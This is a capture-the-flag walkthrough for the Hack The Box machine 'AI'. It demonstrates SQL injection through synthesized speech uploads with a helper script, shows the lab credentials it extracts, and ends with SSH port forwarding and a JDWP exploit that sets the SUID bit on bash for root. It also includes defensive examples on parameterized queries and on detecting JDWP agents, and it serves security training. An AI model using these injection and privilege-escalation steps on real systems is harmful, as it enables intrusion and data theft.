    HTB target machine: AI

    This article is intended solely for technical exchange, study and research. Using the techniques described here for illegal purposes or to cause damage is strictly prohibited; the author bears no responsibility for any resulting consequences.

    The box is a retired machine that the author accessed with a VIP subscription; its IP address shows as 10.10.10.163.

    This time https://github.com/Tib3rius/AutoRecon is used for an automated, all-round scan.

    Information enumeration and collection
    https://github.com/codingo/Reconnoitre is similar to autorecon
    autorecon 10.10.10.163 -o ./AI-autorecon
    
    sudo nmap -sT -p- --min-rate 10000 -oA scans/alltcp 10.10.10.163
    or
    
    sudo masscan -p1-65535,U:1-65535 10.10.10.163 --rate=1000 -p1-65535,U:1-65535 -e tun0 > ports
    # Pull the port number out of each "Discovered open port N/proto on ..." line and join them with commas
    ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
    sudo nmap -Pn -sV -sC -p$ports 10.10.10.163

    Visiting the IP address directly shows a page with just an image, so brute-force the directories.

    gobuster dir -u http://10.10.10.163 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -x php,txt
    
    kali@kali:~/Downloads/htb/ai$ gobuster dir -u http://10.10.10.163 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -x php,txt
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://10.10.10.163
    [+] Threads:        10
    [+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Extensions:     php,txt
    [+] Timeout:        10s
    ===============================================================
    2021/06/03 14:00:46 Starting gobuster
    ===============================================================
    /images (Status: 301)
    /index.php (Status: 200)
    /contact.php (Status: 200)
    /about.php (Status: 200)
    /uploads (Status: 301)
    /db.php (Status: 200)
    /intelligence.php (Status: 200)
    /ai.php (Status: 200)

    Testing shows that ai.php allows uploading an audio file.

    Audio files can be produced either online or offline on the command line; testing shows that a prepared audio file can be used here to achieve SQL injection.

    Online text-to-speech site
    https://www.text2speech.org/
    However, attempts to get that site to produce injection keywords such as the single quote did not succeed.
    
    Install flite to produce text-to-speech audio files from the command line
    sudo apt install flite
    
    Generate the audio files
    flite -w cntfs.wav -voice rms -t "hehe"  # a normal query
    flite -w cntfs.wav -voice rms -t "shit open single quote"  # a single quote in the input produces an error, confirming SQL injection

    Below are the headers of the POST request that uploads the audio file, with the binary audio body omitted.

    POST http://10.10.10.163/ai.php HTTP/1.1
    Host: 10.10.10.163
    Content-Length: 56658
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://10.10.10.163
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNrJ4hwJy7lzCTXSZ
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.864.37
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://10.10.10.163/ai.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
    Connection: close
    
    ------WebKitFormBoundaryNrJ4hwJy7lzCTXSZ
    Content-Disposition: form-data; name="fileToUpload"; filename="cntfs.wav"
    Content-Type: audio/wav
    
    From the request above we learn that the upload uses the following fields:
    fileToUpload
    filename
    audio/wav

    Here curl is used to make the POST request

    curl -s -X POST http://10.10.10.163/ai.php -F 'fileToUpload=@/tmp/cntfs.wav;type=audio/x-wav' -F 'submit=Process It!'
    or
    curl -s -X POST http://10.10.10.163/ai.php -F 'fileToUpload=@/tmp/cntfs.wav;type=audio/wav' -F 'submit=Process It!'

    Given the test results above, a small shell script makes the SQL injection quick and convenient to test; the code is below.

    #!/bin/bash
    # Usage: ./queryai.sh "<spoken text>"
    # 1. Turn the spoken text into a WAV file with flite.
    flite -w /tmp/cntfs.wav -voice rms -t "$1"
    # 2. Upload it to ai.php and extract the <h3> block that echoes the interpreted query and its result.
    out=$(curl -s -X POST http://10.10.10.163/ai.php -F 'fileToUpload=@/tmp/cntfs.wav;type=audio/wav' -F 'submit=Process It!' | perl -0777 -ne '/<h3>(.*)<h3>/ && print $1,"\n";')
    # 3. Replace the <br /> separating the two lines with a newline and print.
    echo -e "${out/<br />/\n}"

    Save it as queryai.sh and run it as follows to perform the injection.

    Test whether SQL injection exists
    ./queryai.sh "open single quote"
    
    Enumerate the database
    ./queryai.sh "open single quote space union select version open parenthesis close parenthesis comment database"
    
    Query the usernames
    ./queryai.sh "open single quote space union select space username space from users comment database"
    
    Query the passwords
    ./queryai.sh "open single quote space union select space password space from users comment database"
    
    The injection results:
    kali@kali:~/Downloads/htb/ai$ ./queryai.sh "open single quote space union select version open parenthesis close parenthesis comment database"
    Our understanding of your input is : '  union select version()-- -
    Query result : 5.7.27-0ubuntu0.18.04.1
    kali@kali:~/Downloads/htb/ai$ ./queryai.sh "open single quote space union select space username space from users comment database"
    Our understanding of your input is : '  union select   username   from users -- -
    Query result : alexa
    kali@kali:~/Downloads/htb/ai$ ./queryai.sh "open single quote space union select space password space from users comment database"
    Our understanding of your input is : '  union select   password   from users -- -
    Query result : H,Sq9t6}a<)?q93_
    kali@kali:~/Downloads/htb/ai$
    
    The username and password finally obtained:
    Username: alexa
    Password: H,Sq9t6}a<)?q93_
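    The root cause behind the whole injection procedure above is that the transcribed speech is treated as trusted text and concatenated into a SQL statement. The following is an added example, not code from ai.php or from the original post: it models the phonetic-word mapping the page's echoed output suggests ("open single quote" becomes a quote, "comment database" becomes "-- -"; the exact mapping is an assumption), runs the result against a constructed in-memory SQLite database, and shows the concatenated query beside the parameterized one that defeats it.

```python
import sqlite3

# Assumed phonetic-token mapping, approximating the behaviour visible in the
# walkthrough's "Our understanding of your input is" lines. It is a model of
# the application, not its real code.
PHONETIC_TOKENS = {
    "open single quote": "'",
    "open parenthesis": "(",
    "close parenthesis": ")",
    "comment database": "-- -",
    "space": " ",
}


def phonetic_to_text(transcript: str) -> str:
    """Replace spoken punctuation phrases with characters, longest phrase first."""
    text = transcript
    for phrase, char in sorted(PHONETIC_TOKENS.items(), key=lambda kv: -len(kv[0])):
        text = text.replace(phrase, char)
    return text.strip()


def build_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE responses (question TEXT, answer TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO responses VALUES ('hello', 'Hi there!');
        INSERT INTO users VALUES ('alexa', 'constructed-secret-not-the-real-one');
        """
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, text: str) -> list:
    """String concatenation: the transcribed text becomes part of the SQL itself,
    so a UNION in the spoken input reads rows from a different table."""
    sql = f"SELECT answer FROM responses WHERE question = '{text}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn: sqlite3.Connection, text: str) -> list:
    """Parameterized query: the text is bound as a value and can never change
    the statement's structure, however it was produced upstream."""
    sql = "SELECT answer FROM responses WHERE question = ?"
    return [row[0] for row in conn.execute(sql, (text,))]


if __name__ == "__main__":
    db = build_db()
    spoken = "open single quote space union select space password space from users comment database"
    payload = phonetic_to_text(spoken)
    print("interpreted input :", payload)
    print("concatenated query:", lookup_vulnerable(db, payload))
    print("parameterized query:", lookup_safe(db, payload))
```

    The speech-to-text step changes nothing about the trust boundary: whatever the recognizer emits is still attacker-controlled input, so the fix is the same as for a plain HTML form, bind the value with a prepared statement rather than interpolating it into the query.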

    Log in to the target over SSH directly with the username and password obtained.

    sshpass -p 'H,Sq9t6}a<)?q93_' ssh -oStrictHostKeyChecking=no alexa@10.10.10.163

    Listing the processes with ps auxww reveals the following:

    jdwp=transport=dt_socket,address=localhost:8000,server=y,suspend=n 

    Next, check the target's network connections.

    Ports 8000, 8005, 8080 and 8009 are listening on localhost; accessing them shows it is Tomcat, and the JDWP agent on 8000 means a remote command execution vulnerability exists; see:

    https://www.exploit-db.com/exploits/46501

    Since the target only listens on port 8000 locally, use SSH local port forwarding.

    ssh -qNCf -L 8000:127.0.0.1:8000 alexa@10.10.10.163

    Then, on the target as user alexa, run nc localhost 8005 so that the breakpoint the exploit sets on java.net.ServerSocket.accept is hit, and immediately run the remote command exploit.

    python jdwp.py -t 127.0.0.1 -p 8000 --cmd 'chmod u+s /bin/bash'
    
    kali@kali:~/Downloads/htb/ai$ python jdwp.py -t 127.0.0.1 -p 8000 --cmd 'chmod u+s /bin/bash'
    [+] Targeting '127.0.0.1:8000'
    [+] Reading settings for 'OpenJDK 64-Bit Server VM - 11.0.4'
    [+] Found Runtime class: id=b8e
    [+] Found Runtime.getRuntime(): id=7f9ec003e830
    [+] Created break event id=2
    [+] Waiting for an event on 'java.net.ServerSocket.accept'
    [+] Received matching event from thread 0x1
    [+] Selected payload 'chmod u+s /bin/bash'
    [+] Command string object created id:c33
    [+] Runtime.getRuntime() returned context id:0xc34
    [+] found Runtime.exec(): id=7f9ec003e868
    [+] Runtime.exec() successful, retId=c35
    [!] Command successfully executed
    
    Finally, run bash -p as user alexa to escalate privileges.
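    The foothold-to-root step above hinged on one process line: a JVM started with a JDWP agent that any local user could reach. The following is an added example, not part of the original post: it scans ps auxww-style output for JDWP agents (both the -agentlib:jdwp= and the older -Xrunjdwp: spellings) and reports who runs them, where they listen, and whether the bind address is loopback-only. The sample output is constructed, with one line mirroring the walkthrough's finding.

```python
import re

# Constructed sample of `ps auxww` output. The tomcat line mirrors the agent
# string found in the walkthrough; the other lines are filler.
SAMPLE_PS_OUTPUT = """\
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1 225000  9000 ?        Ss   10:00   0:01 /sbin/init
tomcat     812  0.3  8.2 3200000 330000 ?      Sl   10:01   0:42 /usr/bin/java -Xrunjdwp:transport=dt_socket,address=localhost:8000,server=y,suspend=n -jar /opt/app.jar
dev        990  0.0  2.0 2100000 80000 ?       Sl   10:05   0:03 /usr/bin/java -agentlib:jdwp=transport=dt_socket,address=*:5005,server=y,suspend=n Main
alexa     1203  0.0  0.0  21000  3000 pts/0    Ss   10:10   0:00 -bash
"""

# Matches "-agentlib:jdwp=<options>" as well as the legacy "-Xrunjdwp:<options>".
JDWP_RE = re.compile(r"jdwp[=:](\S+)")

LOOPBACK_HOSTS = {"localhost", "127.0.0.1", "::1"}


def parse_jdwp_options(opts: str) -> dict:
    """Turn 'transport=dt_socket,address=localhost:8000,server=y' into a dict."""
    result = {}
    for item in opts.split(","):
        if "=" in item:
            key, value = item.split("=", 1)
            result[key] = value
    return result


def find_jdwp_agents(ps_output: str) -> list:
    """Return one finding per process whose command line carries a JDWP agent.

    loopback_only is True for an explicit loopback host, False for any other
    explicit host (including '*'), and None when the address is a bare port:
    a bare port binds all interfaces on JDK 8 and earlier but only loopback
    on JDK 9 and later, so the JDK version must be checked separately.
    """
    findings = []
    for line in ps_output.splitlines()[1:]:  # skip the ps header line
        match = JDWP_RE.search(line)
        if not match:
            continue
        fields = line.split(None, 10)  # the 11th field is the full command line
        if len(fields) < 11:
            continue
        opts = parse_jdwp_options(match.group(1))
        address = opts.get("address", "")
        if ":" in address:
            host = address.rsplit(":", 1)[0]
            loopback_only = host in LOOPBACK_HOSTS
        else:
            loopback_only = None
        findings.append({
            "user": fields[0],
            "pid": int(fields[1]),
            "address": address,
            "listener": opts.get("server") == "y",
            "suspend": opts.get("suspend", "y") == "y",
            "loopback_only": loopback_only,
        })
    return findings


if __name__ == "__main__":
    for agent in find_jdwp_agents(SAMPLE_PS_OUTPUT):
        print(agent)
```

    A loopback-only bind, as on this box, is not a sufficient control: JDWP has no authentication, so every local account, and anyone who can forward a port through SSH as shown above, can attach and call Runtime.exec in the JVM's security context. The finding to act on is the agent being present at all on a service that is not actively being debugged; with server=y it should be removed from the start-up options or limited to short, supervised debugging sessions.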

    A life without direction needs constant effort before the hazy ambitions in the distance come into view!
    Original article: https://www.cnblogs.com/autopwn/p/14845323.html